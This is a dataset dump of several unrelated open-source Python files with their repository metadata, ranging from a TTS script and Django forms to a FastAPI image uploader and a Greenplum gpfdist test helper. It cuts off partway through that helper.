wav = get_voc_output(voc_predictor=voc_predictor, input=mel)
N += wav.size
T += t.elapse
speed = wav.size / t.elapse
rtf = fs / speed
sf.write(output_dir / (utt_id + ".wav"), wav, samplerate=24000)
print(
f"{utt_id}, mel: {mel.shape}, wave: {wav.shape}, time: {t.elapse}s, Hz: {speed}, RTF: {rtf}."
)
print(f"{utt_id} done!")
print(f"generation speed: {N / T}Hz, RTF: {fs / (N / T) }")
if __name__ == "__main__":
main()
| 36.220884 | 105 | 0.60428 | 1,117 | 9,019 | 4.63205 | 0.225604 | 0.026092 | 0.049285 | 0.035562 | 0.417279 | 0.327793 | 0.279474 | 0.272323 | 0.195593 | 0.177812 | 0 | 0.010103 | 0.297594 | 9,019 | 248 | 106 | 36.366935 | 0.80663 | 0.094356 | 0 | 0.314136 | 0 | 0.015707 | 0.153619 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.010471 | false | 0 | 0.078534 | 0 | 0.094241 | 0.031414 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
624f03a50768131b5be5b3aa75eebf35695e5864 | 1,214 | py | Python | ichnaea/models/tests/test_wifi.py | JaredKerim-Mozilla/ichnaea | cfaef2b903960374050be3ea2e4c1520687de56b | [
"Apache-1.1"
] | null | null | null | ichnaea/models/tests/test_wifi.py | JaredKerim-Mozilla/ichnaea | cfaef2b903960374050be3ea2e4c1520687de56b | [
"Apache-1.1"
] | null | null | null | ichnaea/models/tests/test_wifi.py | JaredKerim-Mozilla/ichnaea | cfaef2b903960374050be3ea2e4c1520687de56b | [
"Apache-1.1"
] | null | null | null | from sqlalchemy.exc import IntegrityError
from ichnaea.models.wifi import (
Wifi,
WifiBlacklist,
)
from ichnaea.tests.base import (
DBTestCase,
GB_LAT,
GB_LON,
)
class TestWifi(DBTestCase):
def test_fields(self):
session = self.session
session.add(Wifi(
key='3680873e9b83', lat=GB_LAT, lon=GB_LON, range=200))
session.flush()
result = session.query(Wifi).first()
self.assertEqual(result.key, '3680873e9b83')
self.assertEqual(result.lat, GB_LAT)
self.assertEqual(result.lon, GB_LON)
self.assertEqual(result.range, 200)
class TestWifiBlacklist(DBTestCase):
def test_fields(self):
session = self.session
session.add(WifiBlacklist(key='3680873e9b83', count=2))
session.flush()
result = session.query(WifiBlacklist).first()
self.assertEqual(result.key, '3680873e9b83')
self.assertEqual(result.count, 2)
def test_unique_key(self):
session = self.session
session.add(WifiBlacklist(key='3680873e9b83'))
session.flush()
session.add(WifiBlacklist(key='3680873e9b83'))
self.assertRaises(IntegrityError, session.flush)
| 25.829787 | 67 | 0.658979 | 133 | 1,214 | 5.93985 | 0.278195 | 0.083544 | 0.159494 | 0.083544 | 0.531646 | 0.407595 | 0.407595 | 0.407595 | 0.407595 | 0.139241 | 0 | 0.072572 | 0.228171 | 1,214 | 46 | 68 | 26.391304 | 0.770544 | 0 | 0 | 0.342857 | 0 | 0 | 0.059308 | 0 | 0 | 0 | 0 | 0 | 0.2 | 1 | 0.085714 | false | 0 | 0.085714 | 0 | 0.228571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6250812328fe0910ddd3cb883062f15468f61a5c | 6,327 | py | Python | utilities/dataIO.py | bmatejek/addax | 3b41733be7fd2de9519d9ac22366345a4a37bc91 | [
"MIT"
] | 3 | 2020-12-09T17:54:29.000Z | 2021-12-17T13:02:37.000Z | utilities/dataIO.py | bmatejek/addax | 3b41733be7fd2de9519d9ac22366345a4a37bc91 | [
"MIT"
] | null | null | null | utilities/dataIO.py | bmatejek/addax | 3b41733be7fd2de9519d9ac22366345a4a37bc91 | [
"MIT"
] | 2 | 2020-12-09T17:55:13.000Z | 2020-12-09T17:55:17.000Z | import bz2
import pickle
import struct
from addax.data_structures.graph import Graph
def ReadGraph(input_filename, header_only = False, vertices_only = False):
"""
Read a graph data structure from disk
@param input_filename: the filename where the graph data is stored
@param vertices_only: boolean flag that determines if edges are read
"""
assert (input_filename.endswith('.graph.bz2'))
data = bz2.decompress(open(input_filename, 'rb').read())
byte_index = 0
# read the basic attributes for the graph
nvertices, nedges, directed, vertex_colored, edge_colored = struct.unpack('qq???', data[byte_index:byte_index + 19])
byte_index += 19
# read the prefix
prefix, = struct.unpack('128s', data[byte_index:byte_index + 128])
byte_index += 128
prefix = prefix.decode().strip('\0')
graph = Graph(prefix, directed, vertex_colored, edge_colored)
if header_only: return graph
# read all the vertices and add them to the graph
for _ in range(nvertices):
index, enumeration_index, community, color, = struct.unpack('qqqh', data[byte_index:byte_index + 26])
byte_index += 26
graph.AddVertex(index, enumeration_index, community, color)
# if the flag to read only vertices is on, avoid reading edges
if vertices_only: return graph
# read all of the edges and add them to the graph
for _ in range(nedges):
source_index, destination_index, weight, color, = struct.unpack('qqdb', data[byte_index:byte_index + 25])
byte_index += 25
graph.AddEdge(source_index, destination_index, weight, color)
# read the vertex type mappings
nvertex_types, = struct.unpack('q', data[byte_index:byte_index + 8])
assert (nvertex_types <= 65536)
byte_index += 8
vertex_type_mapping = {}
for _ in range(nvertex_types):
index, = struct.unpack('q', data[byte_index:byte_index + 8])
byte_index += 8
vertex_type, = struct.unpack('128s', data[byte_index:byte_index + 128])
byte_index += 128
vertex_type_mapping[index] = vertex_type.decode().strip('\0')
if graph.vertex_colored: graph.SetVertexTypeMapping(vertex_type_mapping)
# read the edge type mappings
nedge_types, = struct.unpack('q', data[byte_index:byte_index + 8])
assert (nedge_types <= 7)
byte_index += 8
edge_type_mapping = {}
for _ in range(nedge_types):
index, = struct.unpack('q', data[byte_index:byte_index + 8])
byte_index += 8
edge_type, = struct.unpack('128s', data[byte_index:byte_index + 128])
byte_index += 128
edge_type_mapping[index] = edge_type.decode().strip('\0')
if graph.edge_colored: graph.SetEdgeTypeMapping(edge_type_mapping)
return graph
def ReadPrefix(input_filename):
"""
Read the prefix of a graph data structure from disk
@param input_filename: the filename where the graph data is stored
"""
assert (input_filename.endswith('.graph.bz2'))
data = bz2.decompress(open(input_filename, 'rb').read())
byte_index = 0
# read the basic attributes for the graph
nvertices, nedges, directed, vertex_colored, edge_colored = struct.unpack('qq???', data[byte_index:byte_index + 19])
byte_index += 19
# read the prefix
prefix, = struct.unpack('128s', data[byte_index:byte_index + 128])
byte_index += 128
prefix = prefix.decode().strip('\0')
return prefix
def WriteGraph(graph, output_filename):
"""
Write a graph to disk for later I/O access
@param graph: the graph data structure to save to disk
@param output_filename: the location to save the graph data structure
"""
assert (output_filename.endswith('.graph.bz2'))
# create a new compression object
compressor = bz2.BZ2Compressor()
# write the basic attributes for the graph to disk
nvertices = graph.NVertices()
nedges = graph.NEdges()
directed = graph.directed
vertex_colored = graph.vertex_colored
edge_colored = graph.edge_colored
prefix = graph.prefix
# create an empty byte array which we will concatenate later
compressed_graph = []
compressed_graph.append(compressor.compress(struct.pack('qq???', nvertices, nedges, directed, vertex_colored, edge_colored)))
compressed_graph.append(compressor.compress(struct.pack('128s', prefix.encode())))
# write all of the vertices and their attributes
for vertex in graph.vertices.values():
compressed_graph.append(compressor.compress(struct.pack('qqqh', vertex.index, vertex.enumeration_index, vertex.community, vertex.color)))
# write all of the edges and their attributes
for edge in graph.edges.values():
compressed_graph.append(compressor.compress(struct.pack('qqdb', edge.source_index, edge.destination_index, edge.weight, edge.color)))
# write the vertex types
nvertex_types = len(graph.vertex_type_mapping)
compressed_graph.append(compressor.compress(struct.pack('q', nvertex_types)))
for index, vertex_type in graph.vertex_type_mapping.items():
compressed_graph.append(compressor.compress(struct.pack('q128s', index, vertex_type.encode())))
# write the edge types
nedge_types = len(graph.edge_type_mapping)
compressed_graph.append(compressor.compress(struct.pack('q', nedge_types)))
for index, edge_type in graph.edge_type_mapping.items():
compressed_graph.append(compressor.compress(struct.pack('q128s', index, edge_type.encode())))
# flush the data
compressed_graph.append(compressor.flush())
# convert the array into a binary string - faster than native implementation
compressed_graph = b''.join(compressed_graph)
# write the compressed string to file
with open(output_filename, 'wb') as fd:
fd.write(compressed_graph)
def PickleData(data, filename):
"""
Pickle the data and write to disk
@param data: the data to pickle
@param filename: the location to save the pickled data
"""
with open(filename, 'wb') as fd:
pickle.dump(data, fd)
def ReadPickledData(filename):
"""
Read pickled data from disk and return object
@param filename: the location of the saved pickled data
"""
with open(filename, 'rb') as fd:
return pickle.load(fd)
| 32.116751 | 145 | 0.696223 | 845 | 6,327 | 5.054438 | 0.176331 | 0.080075 | 0.036525 | 0.047764 | 0.52634 | 0.443924 | 0.395458 | 0.361508 | 0.335753 | 0.321705 | 0 | 0.017603 | 0.200885 | 6,327 | 196 | 146 | 32.280612 | 0.827136 | 0.223961 | 0 | 0.263736 | 0 | 0 | 0.024038 | 0 | 0 | 0 | 0 | 0 | 0.054945 | 1 | 0.054945 | false | 0 | 0.043956 | 0 | 0.131868 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6250e3e3613e8b322cfe7d8a32dbc2d49d2b96dd | 921 | py | Python | chat/forms.py | crazyskateface/LC | 6e59b0083d78bca02d08dbc7ce612c6fc4ed44a6 | [
"MIT"
] | 1 | 2015-04-13T19:23:57.000Z | 2015-04-13T19:23:57.000Z | chat/forms.py | crazyskateface/LC | 6e59b0083d78bca02d08dbc7ce612c6fc4ed44a6 | [
"MIT"
] | null | null | null | chat/forms.py | crazyskateface/LC | 6e59b0083d78bca02d08dbc7ce612c6fc4ed44a6 | [
"MIT"
] | null | null | null | from chat.models import UserProfile
from django.contrib.auth.models import User
from django.contrib.auth.forms import UserCreationForm
from django import forms
class UserForm(UserCreationForm):
class Meta:
model = User
fields = ('username', 'password1', 'password2')
class UserProfileForm(forms.ModelForm):
class Meta:
model = UserProfile
fields = ('ign','primRole','secRole')
def clean_ign(self):
ign = self.cleaned_data['ign']
if UserProfile.objects.exclude(pk=self.instance.pk).filter(ign=ign).exists():
raise forms.ValidationError(u'Summoner name already in use: %(ign)s',
code='invalid',
params={'ign': ign},
)
return ign
| 28.78125 | 86 | 0.525516 | 85 | 921 | 5.670588 | 0.576471 | 0.062241 | 0.070539 | 0.087137 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003515 | 0.382193 | 921 | 31 | 87 | 29.709677 | 0.843585 | 0 | 0 | 0.1 | 0 | 0 | 0.105618 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.05 | false | 0.05 | 0.2 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6251e14bb335b87e274599d8e9f0516b94c28639 | 812 | py | Python | gendiff/file_loader.py | vetalpaprotsky/python-project-lvl2 | b309ab19dbb122c93f8f5c468ad6e1c35dd8df93 | [
"MIT"
] | null | null | null | gendiff/file_loader.py | vetalpaprotsky/python-project-lvl2 | b309ab19dbb122c93f8f5c468ad6e1c35dd8df93 | [
"MIT"
] | null | null | null | gendiff/file_loader.py | vetalpaprotsky/python-project-lvl2 | b309ab19dbb122c93f8f5c468ad6e1c35dd8df93 | [
"MIT"
] | 1 | 2020-11-24T17:56:29.000Z | 2020-11-24T17:56:29.000Z | import os
import json
import yaml
def load_file(file_path):
file_type = _get_file_type(file_path)
with open(file_path) as file:
return _parse_file(file, file_type)
def _parse_file(file, file_type):
if file_type == 'json':
result = json.load(file)
elif file_type == 'yaml':
# If the file is empty, then the return value of load
# function is None. In that case an empty dict is assigned
# to the result variable.
result = yaml.load(file, Loader=yaml.Loader) or {}
else:
raise ValueError('Unsupported file type')
return result
def _get_file_type(file_path):
_, file_ext = os.path.splitext(file_path)
if file_ext == '.json':
return 'json'
elif file_ext == '.yml' or file_ext == '.yaml':
return 'yaml'
| 26.193548 | 66 | 0.642857 | 119 | 812 | 4.168067 | 0.361345 | 0.129032 | 0.048387 | 0.060484 | 0.16129 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.258621 | 812 | 30 | 67 | 27.066667 | 0.82392 | 0.162562 | 0 | 0 | 0 | 0 | 0.075444 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.142857 | 0 | 0.47619 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6253782f1b223004bc66779acddd253d42bb4adb | 1,316 | py | Python | setup.py | BioGeek/pyseqlogo | e41d9645c7a9fa5baf3deab281acf40ea5357f64 | [
"MIT"
] | 24 | 2017-10-23T16:06:18.000Z | 2022-03-04T14:09:25.000Z | setup.py | BioGeek/pyseqlogo | e41d9645c7a9fa5baf3deab281acf40ea5357f64 | [
"MIT"
] | 7 | 2020-11-19T13:55:54.000Z | 2021-11-30T03:16:33.000Z | setup.py | BioGeek/pyseqlogo | e41d9645c7a9fa5baf3deab281acf40ea5357f64 | [
"MIT"
] | 16 | 2018-02-01T16:12:07.000Z | 2021-09-28T03:53:11.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup
with open('README.rst') as readme_file:
readme = readme_file.read()
with open('HISTORY.rst') as history_file:
history = history_file.read()
with open('requirements.txt') as reqs:
requirements = reqs.readlines()
test_requirements = requirements + ['pytest']
setup(
name='pyseqlogo',
version='0.1.0',
description="Python package to analyse ribosome profiling data",
long_description=readme + '\n\n' + history,
author="Saket Choudhary",
author_email='saketkc@gmail.com',
url='https://github.com/saketkc/pyseqlogo',
packages=[
'pyseqlogo',
],
package_dir={'pyseqlogo': 'pyseqlogo'},
include_package_data=True,
install_requires=requirements,
license="BSD license",
zip_safe=False,
keywords='pyseqlogo',
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Natural Language :: English',
"Programming Language :: Python :: 2",
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
],
test_suite='tests',
tests_require=test_requirements)
| 28.608696 | 68 | 0.643617 | 144 | 1,316 | 5.777778 | 0.569444 | 0.091346 | 0.120192 | 0.038462 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010638 | 0.214286 | 1,316 | 45 | 69 | 29.244444 | 0.794004 | 0.031915 | 0 | 0.054054 | 0 | 0 | 0.397013 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.027027 | 0 | 0.027027 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
62552b8743ab6f12c3ce33e49ef1aceb7b95482d | 1,238 | py | Python | combine_csv.py | dsschult/scripts | 69a738d0d71081825c5e79f0cb52b31fd7396ebb | [
"MIT"
] | null | null | null | combine_csv.py | dsschult/scripts | 69a738d0d71081825c5e79f0cb52b31fd7396ebb | [
"MIT"
] | 1 | 2017-09-12T20:53:44.000Z | 2017-10-05T14:07:12.000Z | combine_csv.py | dsschult/scripts | 69a738d0d71081825c5e79f0cb52b31fd7396ebb | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import sys
import csv
out = sys.argv[-1]
header = []
data = {}
for infile in sys.argv[1:-1]:
print('reading',infile)
with open(infile, 'r') as csvfile:
csvfilereader = csv.reader(csvfile)
local_header = []
for i,row in enumerate(csvfilereader):
if i == 0: # header
local_header = row[1:]
if not header:
header = row[1:]
else:
id = row[0]
row_data = map(float,row[1:])
print(row_data)
if id not in data:
data[id] = {c:d for c,d in zip(local_header,row_data)}
else:
for c,d in zip(local_header,row_data):
if c in data[id]:
data[id][c] += d
else:
data[id][c] = d
print('writing',out)
with open(out, 'w') as outfile:
outwriter = csv.writer(outfile, quoting=csv.QUOTE_MINIMAL)
outwriter.writerow(['site']+header)
for id in sorted(data,key=lambda id:sum(data[id].values()),reverse=True):
outwriter.writerow([id]+[data[id][c] if c in data[id] else 0 for c in header])
| 32.578947 | 86 | 0.495153 | 163 | 1,238 | 3.705521 | 0.337423 | 0.069536 | 0.046358 | 0.039735 | 0.129139 | 0.092715 | 0.092715 | 0.092715 | 0.092715 | 0 | 0 | 0.011688 | 0.378029 | 1,238 | 37 | 87 | 33.459459 | 0.772727 | 0.021809 | 0 | 0.090909 | 0 | 0 | 0.016543 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.060606 | 0 | 0.060606 | 0.090909 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
62594c8ef5630b783a3a7d27f7863d52f93f200b | 2,510 | py | Python | examples/NeuralNetwork/normalization_multi_input.py | MambaWong/depthai-python-1 | 0d15abd77fd82b4a70e096ea5bb99237a17c9862 | [
"MIT"
] | 9 | 2020-03-10T15:10:02.000Z | 2020-06-01T22:58:04.000Z | examples/NeuralNetwork/normalization_multi_input.py | MambaWong/depthai-python-1 | 0d15abd77fd82b4a70e096ea5bb99237a17c9862 | [
"MIT"
] | 11 | 2020-03-11T20:42:30.000Z | 2020-06-10T11:53:49.000Z | examples/NeuralNetwork/normalization_multi_input.py | MambaWong/depthai-python-1 | 0d15abd77fd82b4a70e096ea5bb99237a17c9862 | [
"MIT"
] | 2 | 2020-04-23T19:20:04.000Z | 2020-05-12T00:20:34.000Z | #!/usr/bin/env python3
from pathlib import Path
import sys
import numpy as np
import cv2
import depthai as dai
SHAPE = 300
# Get argument first
nnPath = str((Path(__file__).parent / Path('../models/normalize_openvino_2021.4_4shave.blob')).resolve().absolute())
if len(sys.argv) > 1:
nnPath = sys.argv[1]
if not Path(nnPath).exists():
import sys
raise FileNotFoundError(f'Required file/s not found, please run "{sys.executable} install_requirements.py"')
p = dai.Pipeline()
p.setOpenVINOVersion(dai.OpenVINO.VERSION_2021_4)
camRgb = p.createColorCamera()
# Model expects values in FP16, as we have compiled it with `-ip FP16`
camRgb.setFp16(True)
camRgb.setInterleaved(False)
camRgb.setPreviewSize(SHAPE, SHAPE)
nn = p.createNeuralNetwork()
nn.setBlobPath(nnPath)
nn.setNumInferenceThreads(2)
script = p.create(dai.node.Script)
script.setScript("""
# Run script only once. We could also send these values from host.
# Model formula:
# output = (input - mean) / scale
# This configuration will subtract all frame values (pixels) by 127.5
# 0.0 .. 255.0 -> -127.5 .. 127.5
data = NNData(2)
data.setLayer("mean", [127.5])
node.io['mean'].send(data)
# This configuration will divide all frame values (pixels) by 255.0
# -127.5 .. 127.5 -> -0.5 .. 0.5
data = NNData(2)
data.setLayer("scale", [255.0])
node.io['scale'].send(data)
""")
# Re-use the initial values for multiplier/addend
script.outputs['mean'].link(nn.inputs['mean'])
nn.inputs['mean'].setWaitForMessage(False)
script.outputs['scale'].link(nn.inputs['scale'])
nn.inputs['scale'].setWaitForMessage(False)
# Always wait for the new frame before starting inference
camRgb.preview.link(nn.inputs['frame'])
# Send normalized frame values to host
nn_xout = p.createXLinkOut()
nn_xout.setStreamName("nn")
nn.out.link(nn_xout.input)
# Pipeline is defined, now we can connect to the device
with dai.Device(p) as device:
qNn = device.getOutputQueue(name="nn", maxSize=4, blocking=False)
shape = (3, SHAPE, SHAPE)
while True:
inNn = np.array(qNn.get().getData())
# Get back the frame. It's currently normalized to -0.5 - 0.5
frame = inNn.view(np.float16).reshape(shape).transpose(1, 2, 0)
# To get original frame back (0-255), we add multiply all frame values (pixels) by 255 and then add 127.5 to them
frame = (frame * 255.0 + 127.5).astype(np.uint8)
# Show the initial frame
cv2.imshow("Original frame", frame)
if cv2.waitKey(1) == ord('q'):
break
| 31.375 | 121 | 0.700398 | 382 | 2,510 | 4.568063 | 0.447644 | 0.018338 | 0.024069 | 0.034384 | 0.080229 | 0.067622 | 0 | 0 | 0 | 0 | 0 | 0.048746 | 0.158167 | 2,510 | 79 | 122 | 31.772152 | 0.777094 | 0.198805 | 0 | 0.072727 | 0 | 0 | 0.327836 | 0.083458 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.109091 | 0 | 0.109091 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
62632619459e288669a5fee1ef7042535b7e5247 | 3,132 | py | Python | image_upload/routers/upload.py | rso-school-project/image-upload | 91d79868265cba28aedef91b4174b890959843a0 | [
"MIT"
] | null | null | null | image_upload/routers/upload.py | rso-school-project/image-upload | 91d79868265cba28aedef91b4174b890959843a0 | [
"MIT"
] | null | null | null | image_upload/routers/upload.py | rso-school-project/image-upload | 91d79868265cba28aedef91b4174b890959843a0 | [
"MIT"
] | null | null | null | import time
from PIL import Image
import hashlib
import numbers
from google.cloud import pubsub_v1
from typing import List
from fastapi import APIRouter, Depends, UploadFile, File, Form, HTTPException
from starlette.requests import Request
from func_timeout import func_set_timeout
from sqlalchemy.orm import Session
from google.cloud import storage
from image_upload import settings
from image_upload.utils import fallback
from image_upload.database import crud, models, schemas, get_db, engine
try:
models.Base.metadata.create_all(bind=engine, checkfirst=True)
except:
pass
router = APIRouter()
# Instantiates a client
storage_client = storage.Client()
bucket_name = "super_skrivni_bozickov_zaklad"
bucket = storage_client.bucket(bucket_name)
# Pub/sub.
publisher = pubsub_v1.PublisherClient()
subscriber = pubsub_v1.SubscriberClient()
topic_name = 'projects/{project_id}/topics/{topic}'.format(
project_id='forward-leaf-258910',
topic='image_to_process',
)
subscription_name = 'projects/{project_id}/subscriptions/{sub}'.format(
project_id='forward-leaf-258910',
sub='image-upload',
)
def callback(message):
print(message)
tags = message.attributes["image_tags"]
image_id = message.attributes["image_id"]
crud.update_tags(db=next(get_db()), image_id=int(image_id), tags=tags)
message.ack()
future = subscriber.subscribe(subscription_name, callback)
@router.post('/images', response_model=schemas.Image)
def upload(*, user_id: int = Form(...), file: UploadFile = File(...), db: Session = Depends(get_db)):
try:
Image.open(file.file)
except:
raise HTTPException(status_code=400, detail='Uploaded file is not an image.')
if not isinstance(user_id, numbers.Number):
raise HTTPException(status_code=400, detail='user_id is not a number.')
# Get hash.
file_hash = hashlib.sha1(file.filename.encode('utf-8')).hexdigest() + "." + file.filename.split(".")[-1]
# Save to DB.
new_image = crud.create_image(db=db, file_name=file.filename, file_hash=file_hash, user_id=user_id)
iid = new_image.id
# Upload to GC, append file ID to hash.
file.file.seek(0)
try:
blob = bucket.blob(str(iid) + file_hash)
blob.upload_from_file(file.file)
except:
crud.delete_image(db=db, image_id=iid)
raise HTTPException(status_code=400, detail='Upload to gCloud failed.')
# Send to image processor.
url_r = str(iid) + file_hash
url_l = "https://storage.googleapis.com/super_skrivni_bozickov_zaklad/"
publisher.publish(topic_name, b'', image_id=str(iid), image_url=url_l + url_r)
return new_image
@router.delete('/images/{image_id}', response_model=schemas.Image)
def delete_image(image_id: int, db: Session = Depends(get_db)):
db_image = crud.delete_image(db=db, image_id=image_id)
if db_image is None:
raise HTTPException(status_code=404, detail='Image not found')
return db_image
@router.get('/settings')
async def test_configs(request: Request):
return {"Config for X:": f"{settings.config_x}", "Config for Y:": f"{settings.config_y}"}
| 29.271028 | 108 | 0.724457 | 442 | 3,132 | 4.945701 | 0.346154 | 0.035224 | 0.043916 | 0.051235 | 0.148673 | 0.103843 | 0.023788 | 0 | 0 | 0 | 0 | 0.011711 | 0.154853 | 3,132 | 106 | 109 | 29.54717 | 0.814129 | 0.036718 | 0 | 0.114286 | 0 | 0 | 0.149169 | 0.035216 | 0 | 0 | 0 | 0 | 0 | 1 | 0.042857 | false | 0.014286 | 0.2 | 0 | 0.285714 | 0.014286 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
62632d07fbec61396b9f199a3518e46ccf03463e | 7,678 | py | Python | src/test/tinc/tincrepo/mpp/lib/GPFDIST.py | lintzc/GPDB | b48c8b97da18f495c10065d0853db87960aebae2 | [
"PostgreSQL",
"Apache-2.0"
] | 1 | 2017-09-15T06:09:56.000Z | 2017-09-15T06:09:56.000Z | src/test/tinc/tincrepo/mpp/lib/GPFDIST.py | guofengrichard/gpdb | 29bdd6ef38d8d9b9cb04ca31d44e279eb9f640d3 | [
"PostgreSQL",
"Apache-2.0"
] | null | null | null | src/test/tinc/tincrepo/mpp/lib/GPFDIST.py | guofengrichard/gpdb | 29bdd6ef38d8d9b9cb04ca31d44e279eb9f640d3 | [
"PostgreSQL",
"Apache-2.0"
] | 1 | 2018-12-04T09:13:57.000Z | 2018-12-04T09:13:57.000Z | """
Copyright (C) 2004-2015 Pivotal Software, Inc. All rights reserved.
This program and the accompanying materials are made available under
the terms of the under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import platform
import time
import tinctest
from gppylib.commands.base import Command
from tinctest.lib import run_shell_command
class GPFDISTError(Exception):
pass
class GPFDIST:
def __init__(self, port, hostname, directory=None):
"init"
self.port = port
self.hostname = hostname
self.secure = False
self.ssl_cert = ""
if directory is None:
directory = os.getcwd()
self.directory = directory
self.gphome = os.environ.get("GPHOME")
# Ensure we use compatible ps command on Solaris platform
self.ps_command = 'ps'
if platform.system() in ['SunOS']:
self.ps_command = '/bin/ps'
def gethost(self):
return self.hostname
def getport(self):
return self.port
def getdir(self):
return self.directory
def startGpfdist(self, options="", port=None, raise_assert=True, ssl=None):
"""
start hosting the data
@comment: Why do we need to ssh to a host that is localhost
killGpfdist does not support kill process on other host
@note: If we are to use ssh subprocess, we will go to the home folder,
let's revisit this with remote command so that it works for starting
gpfdist on remote host
"""
if port is None:
port = self.port
else:
port = str(port)
if ssl is None:
ssl = ""
else:
self.secure = True
self.ssl_cert = ssl
ssl = "--ssl %s" % self.ssl_cert
directory = self.directory
gpfdist_cmd = "gpfdist -p %s -d %s %s %s" % (port, directory, options, ssl)
cmd = "gpssh -h %s 'source %s/greenplum_path.sh; %s > /dev/null &'" % (self.hostname, self.gphome, gpfdist_cmd)
res = {'rc':0, 'stderr':'', 'stdout':''}
run_shell_command(cmd, 'gpfdist', res)
if res['rc'] > 0:
raise Exception("Failed to start gpfdist on host %s and port %s with non-zero rc" %(self.hostname, port))
return self.check_gpfdist_process(port=port, raise_assert=raise_assert)
def check_gpfdist_process(self, wait=60, port=None, raise_assert=True):
"""
Check for the gpfdist process
Wait at least 60s until gpfdist starts, else raise an exception
"""
if port is None:
port = self.port
process_started = False
count = 0
while (not process_started and count<wait):
cmd_str = " | ".join([
self.ps_command + ' -ef',
'grep \"[g]pfdist -p %s\"' % (port)])
cmd = "gpssh -h %s '%s'" %(self.hostname, cmd_str)
res = {'rc':0, 'stderr':'', 'stdout':''}
run_shell_command(cmd, 'gpfdist process check', res)
content = res['stdout']
if len(content)>0:
if content.find("gpfdist -p %s" % port)>0:
process_started = self.is_gpfdist_connected(port)
if process_started:
return True
count = count + 1
time.sleep(1)
if raise_assert:
raise GPFDISTError("Could not start gpfdist process")
else:
tinctest.logger.warning("Could not start gpfdist process")
def is_gpfdist_connected(self, port=None):
"""
Check gpfdist by connecting after starting process
@return: True or False
@todo: Need the absolute path
"""
if port is None:
port = self.port
url = "http://%s:%s" % (self.hostname, port)
if self.secure:
url = url.replace("http:", "https:") + " -k"
cmd_str = "curl %s" %url
res = {'rc':0, 'stderr':'', 'stdout':''}
run_shell_command(cmd_str, 'gpfdist process check', res)
content = res['stdout']
if content.find("couldn't")>=0:
return False
return True
def is_port_released(self, port=None):
"""
Check whether the port is released after stopping gpfdist
@return: True or False
"""
if port is None:
port = self.port
cmd_str = "netstat -an | grep %s" % port
